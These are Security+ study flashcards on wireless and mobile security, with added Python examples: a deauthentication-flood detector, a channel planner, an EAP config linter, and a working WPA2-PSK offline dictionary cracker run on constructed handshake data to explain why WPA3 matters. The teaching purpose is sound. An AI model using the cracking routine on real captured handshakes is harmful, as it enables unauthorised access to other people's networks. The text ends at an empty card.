Security Plus - Chapter 13 Flashcards

1
Q

Cellular Network

A

Provide connectivity for mobile devices such as cell phones by dividing a geographic area into "cells", each served by a tower (cell site), allowing wireless communication between devices and the towers.
Generations include LTE (Long-Term Evolution)/4G and 5G. 5G requires a much denser antenna distribution but delivers significantly more speed. Connectivity is provided by a cellular carrier whose network is secured, managed, and controlled outside your organization, so traffic sent over a cellular connection traverses a third-party network and should be protected end to end (for example with TLS or a VPN).

2
Q

Wi-Fi Network

A

A family of IEEE 802.11 protocols used to provide wireless networking. Relies on the 2.4 GHz and 5 GHz radio bands (and 6 GHz with Wi-Fi 6E/7) and uses multiple channels within those bands to allow multiple networks to coexist.
Standard Wi-Fi generations (slowest to fastest; maximum theoretical data rate and band):
- 802.11b - 11 Mbps, 2.4 GHz
- 802.11a - 54 Mbps, 5 GHz
- 802.11g - 54 Mbps, 2.4 GHz
- 802.11n (Wi-Fi 4) - 600 Mbps, 2.4 and 5 GHz
- 802.11ac (Wi-Fi 5) - 6.9 Gbps, 5 GHz
- 802.11ax (Wi-Fi 6/6E) - 9.6 Gbps, 2.4, 5, or 6 GHz
- 802.11be (Wi-Fi 7) - 40+ Gbps, 2.4, 5, or 6 GHz

3
Q

Other Wireless Network Information

A

Security protocols: WPA2 and WPA3 (detailed on the Wi-Fi Security Standards card).

Ad hoc mode - Devices talk to each other directly, with no access point.
Infrastructure mode - Traffic goes through a base station or access point.

Service Set Identifiers (SSIDs) - The wireless network name. An SSID can be broadcast in beacons or hidden (broadcast disabled). Hiding the SSID is not a security control: it still appears in probe and association frames and is trivially recovered with a sniffer.

4
Q

Bluetooth

A

Operates in the 2.4 GHz band, providing low-power, short-range connections (roughly 10 meters for common Class 2 devices, up to about 100 meters for Class 1) for devices that do not need high bandwidth.

5
Q

Bluetooth Security Modes

A

Security Mode 1 - No security (unsecure): no authentication or encryption.
Security Mode 2 - Service-level enforced security: security policies are applied per service after the link is established.
Security Mode 3 - Link-level enforced security: authentication and encryption are enforced before the link is established.
Security Mode 4 - Service-level enforced security using Secure Simple Pairing (SSP), available from Bluetooth 2.1 onward.

Bluetooth's legacy encryption is weak and is not always enforced, so it should not be relied on for confidentiality. Fixed PINs (such as 0000 or 1234 on many headsets) reduce the security of pairing, and Bluetooth traffic is susceptible to eavesdropping.

6
Q

Radio Frequency Identification (RFID)

A

A relatively short-range (less than a foot for passive tags, up to about 100 meters for active tags) wireless technology that uses a tag and a reader to exchange information.

Active tags have their own power source and continuously transmit so a reader can pick them up; semi-active (semi-passive) tags have a battery but transmit only when activated by a reader; passive tags have no battery and are powered entirely by the reader's signal.

Frequency ranges:
Low frequency (LF, roughly 125-134 kHz) - Short range and low power, used for entry access and identification, where the tag is scanned by a nearby reader.
High frequency (HF, 13.56 MHz) - Longer readable range (up to about a meter) and faster communication. Used for near-field communication (NFC); supports read-only, write-once, and rewritable tags.
Ultra-high frequency (UHF, roughly 860-960 MHz) - The fastest to read, with the longest range. Used where readers are far from the tags, such as inventory management and anti-theft, where a tag can be read from meters away.

7
Q

Global Positioning System (GPS)

A

Uses a constellation of satellites that broadcast signals received by a compatible GPS receiver. Consumer receivers are typically accurate to within a few meters; with augmentation, accuracy can reach within a foot. This allows accurate placement for geofencing and other location-based uses, and GPS also provides a consistent, precise time signal.

Attacks:
Civilian GPS signals are weak and unauthenticated, so they can be jammed (drowned out, so the receiver loses its fix) or spoofed (counterfeit signals make the receiver report a false position or time).

8
Q

Near-Field Communication (NFC) Not on exam

A

Short-range communication between devices, such as a phone and a payment terminal. Range is under 4 inches (about 10 cm), so attacks must come from another device in very close physical proximity.

9
Q

Infrared (Not on exam)

A

Wireless technology that requires line of sight between the devices. Speeds range widely, from 115 kbit/s to 1 Gbit/s. Example: television remote controls.

10
Q

Wireless Connection Models

A

Point-to-Point - Connects two nodes; transmissions between them are intended to be received only by the two endpoints.

Point-to-Multipoint - Connects multiple devices to a single location. Ex. a Wi-Fi access point serving many clients.

Broadcast - Sends information from one node to many nodes, all of which can receive it. Ex. GPS and radio.

11
Q

Attacks against Wireless Network and Devices

A

Evil Twin - A malicious, illegitimate access point set up to look like a legitimate, trusted network (typically by copying its SSID and often with a stronger signal), so that victims connect through it and the attacker can intercept or manipulate their traffic.

11
Q

Rogue Access Points

A

Access points that are added to your network either intentionally or unintentionally. Once connected, they offer a point of entry to attackers or other unwanted users.

12
Q

Bluetooth Attacks

A

Bluejacking - Sends unsolicited messages to Bluetooth-enabled devices.
Bluesnarfing - Unauthorized access to a Bluetooth device, typically aimed at gathering information like contact lists or other details of or on the device.
Bluetooth impersonation attacks - Take advantage of weaknesses in the Bluetooth specification, meaning that all devices that implement Bluetooth as expected are likely to be vulnerable to them. They exploit a lack of mutual authentication.

13
Q

Disassociation Attack

A

When a threat actor causes a device to disconnect from its access point. The client then tries to reconnect, giving the attacker a window of opportunity to stand up a more powerful evil twin or to capture the reconnection handshake (for example the WPA2 four-way handshake) as the system rejoins.
Attackers commonly send deauthentication frames, an 802.11 management frame, with a spoofed source address: the access point's MAC (BSSID), so the client believes the network dropped it, or the client's MAC, so the access point drops the client. Management frames are unauthenticated unless Protected Management Frames (802.11w) are in use, which WPA3 requires.
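The deauthentication flood described above leaves a distinctive signature in a monitor-mode capture: many deauth or disassociation frames from one source in a short time, usually addressed to the broadcast MAC so every client drops at once. The following detector is an added example, not part of the original flashcards or any vendor tool; the frame records, the AP and client MAC addresses, and the thresholds are constructed for illustration.

```python
from collections import defaultdict, deque

DEAUTH, DISASSOC = "deauth", "disassoc"
BROADCAST = "ff:ff:ff:ff:ff:ff"
AP_BSSID = "aa:bb:cc:00:00:01"        # assumed: the legitimate AP's MAC (constructed)
CLIENT = "02:00:00:00:00:10"          # assumed: a legitimate client MAC (constructed)

# Constructed capture (not real traffic). Fields mirror what a monitor-mode
# sniffer reports: timestamp (s), frame subtype, source, destination, reason code.
SAMPLE_FRAMES = [
    {"t": 0.0, "type": "beacon", "src": AP_BSSID, "dst": BROADCAST, "reason": None},
    # a normal deauth: the client itself leaving (reason 3 = station is leaving)
    {"t": 0.5, "type": DEAUTH, "src": CLIENT, "dst": AP_BSSID, "reason": 3},
] + [
    # a flood of broadcast deauths forged with the AP's address as the source
    # (reason 7 = class 3 frame from non-associated station), 20 frames per second
    {"t": 10.0 + i * 0.05, "type": DEAUTH, "src": AP_BSSID, "dst": BROADCAST, "reason": 7}
    for i in range(40)
]


def detect_deauth_flood(frames, window=2.0, threshold=10):
    """Alert on any source MAC that emits `threshold` or more deauth/disassoc
    frames within a sliding `window` of seconds. Returns one alert per source,
    with the total frame count, how many were broadcast, and the reason codes seen."""
    recent = defaultdict(deque)            # src -> timestamps inside the window
    totals = defaultdict(lambda: {"count": 0, "broadcast": 0, "reasons": set()})
    alerts = {}
    for f in sorted(frames, key=lambda f: f["t"]):
        if f["type"] not in (DEAUTH, DISASSOC):
            continue                        # beacons, data frames, etc. are ignored
        src = f["src"]
        totals[src]["count"] += 1
        totals[src]["reasons"].add(f["reason"])
        if f["dst"] == BROADCAST:
            totals[src]["broadcast"] += 1   # broadcast deauths knock off every client at once
        q = recent[src]
        q.append(f["t"])
        while q and f["t"] - q[0] > window:
            q.popleft()                     # drop timestamps that fell out of the window
        if len(q) >= threshold and src not in alerts:
            alerts[src] = {"src": src, "first_seen": q[0]}
    return [dict(alerts[s], **totals[s]) for s in alerts]


if __name__ == "__main__":
    for a in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"ALERT: {a['count']} deauth/disassoc frames from {a['src']} "
              f"({a['broadcast']} broadcast, reasons {sorted(a['reasons'])}) "
              f"starting at t={a['first_seen']:.2f}s")
```

The single legitimate deauth from the client never trips the detector, while the forged burst does. With 802.11w enabled, clients discard forged management frames because they fail the MIC check, but the frames are still visible on the air, so this kind of detection remains useful for spotting an attacker in range.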

14
Q

Jamming Attack

A

Floods the frequency range in use with radio noise, blocking all traffic on that frequency within the area it is conducted against (a wireless denial of service).

15
Q

Sideloading

A

The process of transferring files to a mobile device, typically via a USB connection, a microSD card, or Bluetooth, in order to install applications from outside the official app store, bypassing the store's vetting and any application controls the organization enforces through it.

16
Q

Jailbreaking

A

Takes advantage of vulnerabilities or other weaknesses in a mobile device's operating system to conduct a privilege escalation attack and root the device. This gives the user more access to the device than the vendor normally allows, and typically disables built-in protections such as app sandboxing and code signing enforcement.

17
Q

Wireless Access Point Design

A

Tuning and placement of wireless access points are critical. Access points have a limited number of channels to operate within, and multiple access points on the same (or overlapping) channel within range of each other degrade the performance and usability of the network. In the 2.4 GHz band only three channels (1, 6, and 11) do not overlap, so neighboring access points should be spread across them; the 5 GHz band offers many more non-overlapping channels. Placement and transmit power also need to be tuned so the network does not extend into areas where the organization does not want it available. Network management software can monitor for interference and overlap problems, adjust channels and power, and detect rogue access points or unknown wireless devices.
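The channel-planning rule above is mechanical enough to check in code: two 2.4 GHz channels interfere unless their numbers are at least 5 apart, and any two access points that can hear each other must not be on interfering channels. The script below is an added example, not from the original flashcards or any management product; the floor layout, the access point names, and which access points hear each other are constructed stand-ins for what a site survey would produce.

```python
from collections import defaultdict

NON_OVERLAPPING_24 = (1, 6, 11)


def channels_overlap(a, b, band="2.4"):
    """2.4 GHz channel centres are 5 MHz apart but each channel is about 22 MHz
    wide, so two channels interfere unless they are at least 5 apart (1/6/11 is
    the usual non-overlapping set). 5 GHz 20 MHz channels (36, 40, 44, ...) only
    interfere when they are the same channel."""
    if band == "2.4":
        return abs(a - b) < 5
    return a == b


def find_conflicts(aps, neighbors):
    """aps: name -> {"channel": int, "band": str}; neighbors: pairs of AP names that
    can hear each other (from the site survey). Returns the interfering pairs."""
    conflicts = []
    for x, y in neighbors:
        ax, ay = aps[x], aps[y]
        if ax["band"] != ay["band"]:
            continue                                   # different bands never interfere
        if channels_overlap(ax["channel"], ay["channel"], ax["band"]):
            kind = "co-channel" if ax["channel"] == ay["channel"] else "adjacent-channel"
            conflicts.append((x, y, kind))
    return conflicts


def assign_channels(names, neighbors, candidates=NON_OVERLAPPING_24):
    """Greedy graph colouring: most-connected APs first, each taking the first
    candidate channel that no already-assigned neighbour overlaps with. If every
    candidate is taken, fall back to the least-used one; that AP then needs a
    power reduction or a move, which the survey has to settle."""
    adj = defaultdict(set)
    for x, y in neighbors:
        adj[x].add(y)
        adj[y].add(x)
    plan = {}
    for name in sorted(names, key=lambda n: -len(adj[n])):
        taken = {plan[n] for n in adj[name] if n in plan}
        free = [c for c in candidates if not any(channels_overlap(c, t) for t in taken)]
        plan[name] = free[0] if free else min(candidates, key=lambda c: list(plan.values()).count(c))
    return plan


# Constructed example floor: four 2.4 GHz APs and which ones hear each other.
SURVEY_NEIGHBORS = [("Lobby", "East"), ("East", "West"), ("West", "Server"), ("Lobby", "West")]
CURRENT_PLAN = {
    "Lobby": {"channel": 1, "band": "2.4"},
    "East": {"channel": 3, "band": "2.4"},     # channel 3 overlaps both 1 and 6
    "West": {"channel": 6, "band": "2.4"},
    "Server": {"channel": 6, "band": "2.4"},   # same channel as its neighbour West
}

if __name__ == "__main__":
    print("conflicts now:", find_conflicts(CURRENT_PLAN, SURVEY_NEIGHBORS))
    proposed = assign_channels(CURRENT_PLAN, SURVEY_NEIGHBORS)
    fixed = {n: {"channel": c, "band": "2.4"} for n, c in proposed.items()}
    print("proposed:", proposed, "conflicts after:", find_conflicts(fixed, SURVEY_NEIGHBORS))
```

Run as-is it reports three conflicts in the current plan (two adjacent-channel, one co-channel) and proposes a 1/6/11 assignment with none. Real controllers do the same job with measured signal levels instead of a yes/no neighbor list, but the constraint being enforced is this one.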

18
Q

Site Surveys

A

Involve walking through a facility or space to determine what wireless networks already exist there and to examine the physical structure for candidate access point locations. Wireless signal strength tools measure signal as you walk the facility and can be combined with GPS or a floor plan to mark each measured spot with its signal strength and the channel or channels each access point is using.

19
Q

Heatmap

A

A floor-plan map of wireless coverage across a facility, showing access point placement, signal strength at each point, and the channels each access point is on. Used to find dead zones, excessive overlap, and coverage that spills outside the intended area.

20
Q

Wireless Local Area Network (WLAN)

A

WLAN controllers centrally manage access points and the organization's wireless network (configuration, channel and power settings, firmware, and security policy). They can be deployed as hardware appliances, cloud-hosted services, virtual machines, or software packages.

21
Q

Securing WLAN Controllers

A

Both controllers and access points should be secured by changing default settings, disabling insecure protocols and services, setting strong passwords, protecting their administrative interfaces by placing them on isolated VLANs, and ensuring they are regularly patched and updated.

22
Q

Wi-Fi Security Standards

A

WPA2-Personal - Uses a pre-shared key (PSK) and is therefore often called WPA2-PSK. Clients authenticate with a shared passphrase, without any authentication infrastructure.

WPA2-Enterprise - Relies on a RADIUS authentication server as part of an 802.1X implementation for authentication.

WPA2 introduced Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP). CCMP uses the Advanced Encryption Standard (AES) in counter mode for confidentiality, delivering much stronger encryption than earlier protocols such as Wired Equivalent Privacy (WEP) and TKIP, and its CBC-MAC component provides integrity and authenticity for each frame.

WPA3 - Replaces WPA2; WPA3 support has been mandatory for Wi-Fi CERTIFIED devices since 2020. WPA3 improvements:
- WPA3-Personal - Provides additional protection for password-based authentication using Simultaneous Authentication of Equals (SAE). SAE replaces the WPA2 PSK handshake with a password-authenticated key exchange that requires live interaction between the client and the network to validate both sides, so an attacker cannot capture a handshake and brute-force the passphrase offline. WPA3 also provides forward secrecy, so recorded traffic between the client and the network stays protected even if the password is later compromised.

- WPA3-Enterprise - Provides stronger encryption than WPA2 with an optional 192-bit security mode (AES-256 in GCMP, SHA-384-based key derivation, and 384-bit elliptic-curve key exchange), and requires Protected Management Frames, so management frames such as deauthentication are authenticated rather than trivially forgeable.

23
Q

Perfect Forward Secrecy

A

A property of a key exchange in which each session's encryption keys are derived from fresh, ephemeral values (such as a per-session Diffie-Hellman exchange) rather than from a long-term secret alone, so exposure of one session key or of the long-term password does not expose earlier recorded sessions. Keys may also be rotated within a session at set intervals or per message to limit how much traffic any single key protects.
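The two cards above make a concrete claim: a captured WPA2-PSK handshake can be attacked offline, and WPA2-PSK has no forward secrecy. The script below is an added example, not part of the original flashcards or of any Wi-Fi software; it implements the WPA2 key derivation as specified in IEEE 802.11i (PBKDF2 for the PMK, the "Pairwise key expansion" PRF for the PTK, and the HMAC-SHA1 message integrity code over the EAPOL handshake frame) and then plays the attacker. The SSID, MAC addresses, nonces, wordlist, and EAPOL frame bytes are constructed for the demonstration, not captured traffic.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK (= PSK) = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    Only the SSID salts it, so one dictionary run attacks every network with that SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-384: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 16 bytes are the KCK that authenticates the handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):                                  # 3 x 20 bytes covers 48
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, aa, spa, anonce, snonce, eapol, captured_mic, wordlist):
    """Offline dictionary attack. Everything except the passphrase is in the capture,
    so each guess costs one PBKDF2 + one PRF + one HMAC and no network interaction;
    SAE in WPA3 removes exactly this property by requiring a live exchange per guess."""
    for guess in wordlist:
        ptk = wpa2_ptk(wpa2_pmk(guess, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol), captured_mic):
            return guess, ptk
    return None, None


# Constructed handshake (not a real capture): fixed MACs and nonces so the run is reproducible.
SSID = "corp-wifi"                                      # assumed network name
AA = bytes.fromhex("aabbcc000001")                      # AP (authenticator) MAC, constructed
SPA = bytes.fromhex("020000000010")                     # client (supplicant) MAC, constructed
ANONCE = hashlib.sha256(b"anonce").digest()             # 32-byte nonces, constructed
SNONCE = hashlib.sha256(b"snonce").digest()
EAPOL_M2 = b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(111)  # message 2 stand-in, MIC zeroed
WORDLIST = ["password", "letmein", "Summer2024!", "corp-wifi-123", "hunter2"]  # constructed


def run_demo(passphrase="Summer2024!"):
    """The legitimate session, then the attacker recovering it from the recording.
    Returns (recovered passphrase or None, whether the attacker's PTK equals the session PTK)."""
    session_ptk = wpa2_ptk(wpa2_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    mic = eapol_mic(session_ptk[:16], EAPOL_M2)        # what message 2 carries on the air
    found, attacker_ptk = crack_psk(SSID, AA, SPA, ANONCE, SNONCE, EAPOL_M2, mic, WORDLIST)
    # No forward secrecy: the PTK depends only on the passphrase and values sent in
    # the clear, so once the passphrase is known every recorded session using that
    # handshake can be decrypted.
    return found, attacker_ptk == session_ptk


if __name__ == "__main__":
    print(run_demo())
```

The PBKDF2 step is the only expensive part, which is why attackers precompute it per SSID and why a long random passphrase is the only real defense under WPA2-PSK. The same derivation explains the missing forward secrecy: nothing ephemeral feeds the PTK except nonces that were transmitted unencrypted.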

24
Q

Wireless Network Authentication

A

Open Networks - No authentication required, but they often use a captive portal to gather some information from users before granting access. Captive portals redirect users to a website or registration page before allowing access to the network. Traffic is not encrypted at the link layer, so only data sent over HTTPS (or a VPN) is protected.

Preshared Keys (PSK) - Require a passphrase or key that is shared with everybody who uses the network. Traffic is encrypted, but users cannot be individually identified, and the key must be rotated whenever someone who knows it leaves.

Enterprise Authentication - Relies on a RADIUS server and uses the Extensible Authentication Protocol (EAP) for authentication, so each user or device has its own credential.

25
Q

Wireless Authentication Protocols

A

802.1X is an IEEE standard for port-based access control of both wired and wireless devices. 802.1X integrates with RADIUS servers, allowing users to authenticate before gaining access to the network. Wi-Fi Enterprise networks rely on IEEE 802.1X together with one of several EAP methods, which carry the actual authentication exchange between the device and the RADIUS server.

26
Q

Extensible Authentication Protocol (EAP)

A

Used by 802.1X as part of the authentication process when devices authenticate to a RADIUS server.
EAP Variants:
- Protected EAP (PEAP) - Authenticates the server with a certificate and wraps the inner EAP exchange (commonly MSCHAPv2) in a TLS tunnel to protect the user's credentials. Clients must validate the server certificate; otherwise an evil twin running its own RADIUS server can harvest credentials. Each device ends up with unique per-session keys. (TKIP, which rotated keys on a regular basis under the original WPA, is deprecated; WPA2/WPA3 use AES-CCMP or GCMP.)
- EAP-Flexible Authentication via Secure Tunneling (EAP-FAST) - A Cisco-developed protocol that fixed weaknesses in the Lightweight Extensible Authentication Protocol (LEAP). Focused on fast reauthentication while devices roam. Avoids the public-key operations that slow down PEAP and EAP-TLS by using a symmetric shared secret called the Protected Access Credential (PAC), which can be pre-provisioned or provisioned dynamically using server-certificate authentication.
- EAP-Transport Layer Security (EAP-TLS) - Implements certificate-based, mutual authentication of the device and the network. Uses certificates on both the client and the network side, and the TLS session generates the keys then used for communication. The strongest common option, at the cost of issuing and managing a certificate for every endpoint.
- EAP-Tunneled Transport Layer Security (EAP-TTLS) - Builds on EAP-TLS but does not require the client to have a certificate: only the server presents one, and the client authenticates inside the TLS tunnel (for example with a password). Removes the overhead of distributing and managing endpoint certificates while still providing TLS protection. May require additional client software to be installed.
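The EAP caveat that matters most in practice is server validation: a PEAP or EAP-TTLS client that does not check the RADIUS server's certificate will hand its credentials to an evil twin. The checker below is an added example, not from the original flashcards or from the wpa_supplicant project; it parses the `network={ ... }` blocks of a wpa_supplicant-style configuration and flags the weak settings next to the hardened ones. The configuration text, SSIDs, file paths, and RADIUS hostname are constructed for the demonstration.

```python
# Constructed wpa_supplicant.conf excerpt (not from any real deployment): the first
# PEAP block omits ca_cert, the second pins the CA and the RADIUS server name, the
# third uses EAP-TLS with a client certificate, and the last is an open guest network.
SAMPLE_CONF = """
network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="corp-wifi-hardened"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    ca_cert="/etc/ssl/certs/corp-root.pem"
    domain_suffix_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="corp-wifi-tls"
    key_mgmt=WPA-EAP
    eap=TLS
    identity="alice@corp.example"
    ca_cert="/etc/ssl/certs/corp-root.pem"
    client_cert="/etc/wpa/alice.crt"
    private_key="/etc/wpa/alice.key"
    domain_suffix_match="radius.corp.example"
}
network={
    ssid="guest"    # open network
    key_mgmt=NONE
}
"""

TUNNELED = {"PEAP", "TTLS"}                       # methods that rely on the server certificate
SERVER_NAME_KEYS = ("domain_suffix_match", "domain_match", "subject_match", "altsubject_match")


def parse_networks(text):
    """Return one dict per network={...} block; values have surrounding quotes stripped."""
    nets, cur = [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()           # drop comments and whitespace
        if not line:
            continue
        if line.startswith("network={"):
            cur = {}
        elif line == "}":
            if cur is not None:
                nets.append(cur)
            cur = None
        elif cur is not None and "=" in line:
            key, value = line.split("=", 1)           # phase2="auth=MSCHAPV2" keeps its inner '='
            cur[key.strip()] = value.strip().strip('"')
    return nets


def lint(networks):
    """Return (ssid, severity, message) findings for weak authentication settings."""
    findings = []
    for n in networks:
        ssid = n.get("ssid", "?")
        km = n.get("key_mgmt", "").split()
        if km == ["NONE"]:
            findings.append((ssid, "INFO", "open network: no link-layer encryption, rely on TLS or a VPN"))
            continue
        if "WPA-PSK" in km and "WPA-EAP" not in km:
            findings.append((ssid, "INFO", "pre-shared key: traffic encrypted but users not individually identified"))
        if "WPA-EAP" in km:
            eap = n.get("eap", "")
            if eap in TUNNELED:
                if "ca_cert" not in n:
                    findings.append((ssid, "CRITICAL", f"{eap} without ca_cert: server is not validated, "
                                     "an evil twin with its own RADIUS server can harvest credentials"))
                elif not any(k in n for k in SERVER_NAME_KEYS):
                    findings.append((ssid, "WARN", f"{eap} accepts any certificate from the CA; "
                                     "add domain_suffix_match for the RADIUS server"))
            elif eap == "TLS":
                for k in ("ca_cert", "client_cert", "private_key"):
                    if k not in n:
                        findings.append((ssid, "CRITICAL", f"EAP-TLS block is missing {k}"))
    return findings


if __name__ == "__main__":
    for ssid, severity, msg in lint(parse_networks(SAMPLE_CONF)):
        print(f"[{severity}] {ssid}: {msg}")
```

Only the first PEAP block is flagged as critical; the hardened PEAP and EAP-TLS blocks pass, and the guest network gets an informational note. The same two settings (trust anchor plus server name match) are what an MDM profile for iOS or Android has to push for enterprise Wi-Fi, since users cannot be expected to judge a certificate prompt.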

27
Q

Mobile Device Deployment Methods

A

Bring Your Own Device (BYOD) - User owns the device, user controls and maintains device. Provides more user freedom, less expense for the organization, but greater risk to the organization.

Choose Your Own Device (CYOD) - The organization owns the device, the organization controls and maintains the device. The organization owns and maintains, but allows the user to select the device they prefer.

Corporate-Owned, Personally Enabled (COPE) - The organization owns the device, the organization controls and maintains the device. The organization provides devices but allows reasonable personal use while meeting enterprise security and control needs.

Corporate-Owned (CO) - The organization owns the device, and the organization controls and maintains it. Provides the greatest control but the least flexibility.

Corporate-Owned, Business-Only (COBO) - Organization owned devices used only for business purposes. Does not allow personal use at all. Devices to scan tickets at events, maintenance supervisors to track work performed or inventory counting personnel.

One way to improve the security of these devices is to use Virtual Desktop Infrastructure (VDI): the user connects from the device to a remote environment where the corporate work happens, then returns to normal use of the device after disconnecting, so corporate data never resides on the device. Another option is containerization, which keeps a work container and a personal container separate on the same device.

28
Q

Hardening Mobile Devices

A

The Center for Internet Security (CIS) provides benchmarks for hardening mobile devices. CIS offers benchmarks for both iOS and Android. Hardening techniques include:
- Updating and patching the OS
- Enabling remote wipe functionality
- Requiring passcodes
- Setting automatic screen locks
- Wiping the device after successive passcode failure attempts
- Turning off connectivity options like Bluetooth when not in use

29
Q

Mobile Device Management (MDM)

A

Also known as Unified Endpoint Management (UEM). MDM tools target devices like Android and iOS phones, tablets, and similar devices. UEM tools combine mobile devices, desktops, laptops, and many other types of devices in a single management platform. Another tool for managing mobile devices is a Mobile Application Management (MAM) tool, which controls the applications permitted on a device. Features of an MDM, UEM, or MAM in an organization:
- Application management: deploying specific applications, limiting what applications can be installed, remotely adding, removing, or changing applications and settings, and monitoring application usage.
- Content management: secure access to and control of the organization's files on the device. This matters especially for BYOD, where organizational data must be separated from personal data.
- Remote wipe: used when a device is lost or stolen, or when its owner leaves the organization. Understand the difference between a full device wipe and wiping only the organizational data and applications (selective wipe).
- Geolocation and geofencing: using the phone's location to make decisions about its operation. Ex. only allowing a corporate tablet to be used within the organization's facilities.
- Screen locks, passwords, and PINs: prevent unauthorized access.
- Biometrics: usually adopted for additional security as well as ease of use.
- Context-aware authentication: decisions reflect user behavior such as hours of use, GPS location, and similar signals.
- Containerization: separates the work area hosting organizational data on a device from the personal area. A secure container for work applications and data reduces the risk of cross-contamination and exposure.
- Storage segmentation: also ensures that organizational data remains segregated from personal data on the device.
- Full-device encryption: remains the best way to ensure that a stolen or lost device does not result in a data breach.
- Push notifications: enabled so an urgent communication or alert can be sent to a user about an issue or a required action.

MDM/UEM tools also provide controls for monitoring firmware and updates and ensuring that patching is occurring. They can also limit which Wi-Fi networks a device is permitted to join and the locations where the device may be used.

30
Q

Captive Portal

A